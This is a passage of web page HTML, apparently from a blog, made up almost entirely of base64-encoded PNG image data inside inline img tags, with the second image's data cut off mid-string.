ngX23Hv0xiua6eZMK2qCLtQ8+ta0xMZcJhUJFkxB8UWZKPEbiuIhiqL6xKch5SMhpsGh6ip1OqxhNyGnkeCHhUPWtBxM2NybmMqFQqKgRgi/KZNExcmP2FRwXUQw1+foXWLw0Lqt299l7zOHVsHeffRD/bR3HC3u+b3j68zsmjYm5TCgUKjqE4IsyX3SMxHERxVbzi8uwoDHHVyafvMMcYQ1456meuKxqjhe+Lmn1f1xi2JiYy4RCoaJACL4oS0THSBwXUWwVXF+vaL0PV+PWgjZXlfj1bivqhD0/1djnhEnfmMuEQqHcLgRflFWCMRLHRZQT1PXIBym/m3ObJEU3nen0c6Nb8pqhgIOdU9lCCnOZUCiUq4Xgi7JQzb1eHBdRDpHv5fv0wqscL8RlVe843uXg0K83+UR3XFYNFPscn5pl3XJSYS4TCoVyrxB8UdaKbVYiCiWW/+PSscs9NGCZcuYua8aVevfZe5uO1MMe5lX95Njug7lMKBTKpULwRaFQsaWxyTf7T14Hbtuc25RaMsicdwF5E/NvwF59ebz5/pMXrNsphDCXCYVCuVEIvigUKuYUXF9v7vVuy6kD0EzIadhV3McKeVPO9G/ObYI92ZZTV3971Anz2PQIc5lQKJTrhOCLQqFiVAtLgeZeL11udNOR+h3H/7K3bMge3k0rH9lxvIsmNqR8d6Wmc2hhKcC6VcKTY5MxUCgUSlEIvigUKqYVWAveejABS118DgA3Jp+4bVHxh7SK0eSTd2AZNvC+oqbmXm9gLci6JVAoFCr6heCLQqFQhBAy4nt9or4Xqp7RCXBJhe27ivvSz41FArsZ58dSzvQnFXbQ+C4sPnzscs+jv71yS2IDCoVCRYEQfFEoFOrvCqwFux75sipuJhyqppDK8ZUbsy9vyWtOKmxPPv7TruK+1JLBvWWP0sqHaWA4rWI0rXx4b9lQaslgypn+5BO3kwrbt+Q1b8y+wvGVYt7Nqrh568HE0soq62NFoVComBOCLwqFQikosBYc8b2u6Rziyzp+D8FhO+FQNV/WUdM5NOJ7jSkNKBQKxVAIvigUChVaL999uP/kRXOv90/XB7LPd/JlHemFV9MLrybnXv60im/uZfiEL+vIPt/5p+sDzb3egfHp6dk5TGZAoVAohwjBF4VCoVAoFAoVE0LwRaFQKBQKhULFhBB8USgUCoVCoVAxIQRfFAqFQqFQKFRMCMEXhUKhUCgUChUTQvBFoVAoFAqFQsWEEHxRKBQKhUKhUDEhBF8UCoVCoVAoVEwIwReFQqFQKBQKFRNC8EWhUCgUCoVCxYQQfFEoFAqFQqFQMaH/D09BQRYoK6wBAAAAAElFTkSuQmCC" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" height="156" src="data:image/png;base64,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